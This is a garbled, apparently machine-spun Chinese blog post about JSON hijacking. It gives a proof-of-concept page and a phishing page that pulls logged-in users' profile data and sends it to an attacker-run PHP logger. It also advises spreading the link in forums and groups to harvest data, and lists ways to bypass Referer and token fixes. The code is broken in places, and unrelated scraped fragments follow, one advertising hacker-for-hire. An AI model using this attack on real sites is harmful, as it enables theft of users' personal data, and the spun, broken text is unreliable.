*** ON Hijacking缝隙的具体使用,有点相似与CSRF,不过原理使用 *** 不同,在这边文章我侧重解说json跨域绑架的使用环境建立与 *** 。
0×01缝隙的发掘
一般发掘的过程中,burpsuite署理的History做寻觅,过滤剩余不可能存在缝隙的一些链接,如下图所示:
咱们在回来包中json格局发现了如下的灵敏信息(用户Id,用户名,用户手机号码)。
0×02缝隙的证明之poc
提交缝隙,poc在众测时要分秒必争,所以这边用了最精简的一个POC。
假设回来的数据为:
txf({“data”:{“name”:”唐晓峰”}});
html>
head>
script>
function txf(a){
alert(a.data.name);
}
script>
script src=http://***.***.**/wm/User/getUserInfo?callback=txf>script>
body>
html>
即可如下弹窗:
0×03缝隙的使用之垂钓
1.预备一台web服务器,我直接phpstudy搭的。
附上服务器端的代码
json.php
$nickname=$_GET['name'];
$fp = fopen('info.txt','a');
$flag = fwrite($fp, "姓名: ".$name."rn");
?>html>
垂钓.html
head> title>txftitle>script> var xmlhttp; function txf(a) { xmlhttp=new XMLHttpRequest() var x="http://***.***.***/json.php?name="+a.data.name; xmlhttp.open("GET", x, true); xmlhttp.send(); }script>>script src=http://***.***.***?callback=txf>script>head>body> textarea>垂钓啦,傻瓜textarea>>body>html>
把垂钓链接http://***.***.***/垂钓.html发给该网站已登陆的用户,如论坛,社区 *** 群,社区贴吧等,服务端即可获取到很多用户灵敏数据。
这边以hackone的一个项目为例:
0×04缝隙的修正与绕过
由于这个比如是小伙伴发过来的还没修正,所以都脱敏了,咱们再从开发修正的视点去考虑怎么绕过修正。
1.Referer白名单
子域名绕过,文件名绕过,空Referer绕过
2.添加token认证
token满足杂乱或许服务端加密,咱们无法绕过,假如token很简单,如纯数字,咱们能够测验遍历绕过
3.接口禁用
无敌的操作,无法绕过
总结:
十分有意思的一个绑架,曾经没有使用过,仅仅知道有这么个东西,一般众测或许项目上遇到我都是直接截图,声明一波灵敏信息走漏,然后就完毕了,很低危,这次实战使用之后,略微提高了一点逼格。
0×00概述http://1.acfun.tv现在许多网站都运用CloudFlare供给的服务,咱们或许以往也都遇到过,怎么绕过CloudFlare的防护,找到真是的网站IP,估量咱们都比较蛋疼,必定...
在这个系列文章中,咱们将演示怎么手艺浸透测验web应用程序而不运用自动化东西。世界上大多数公司都十分重视对web应用程序的手艺测验,而不是运转web应用程序扫描器——由于它会约束你的常识和技术,影响在...
2、用ashx页面已文本方式显现web.Config的内容 得到数据库衔接,长处:选用了必定数据剖析的办法,网站的拜访量到达必定量级时这种检测办法的成果具有较大参考价值。 为了得到表格称号,咱们能够运...
波克斗地主 2.212014/3/13 15:56试验环境22、通吃一切商城+动力上传体系第一种技能是一个陈旧的被称为“跨协议脚本”的技能,2001年宣布的论文详细描述了此进犯,但要害的是无论是Red...
一、简介脚本块日志在JavaScript中,你的方法是运用名为web worker的东西。 这些web worker与你在其他言语中运用的线程略有不同。 默许状况下,它们不同享内存。 接单黑客无押金,...
4) 直接通读全文代码,这种方法能够更好的了解代码的事务逻辑,能够挖掘出更有价值的缝隙KillDisk组件的首要意图是损坏电脑上的数据,它会运用随机数据掩盖文件,而且让体系无法重启。 KillDisk...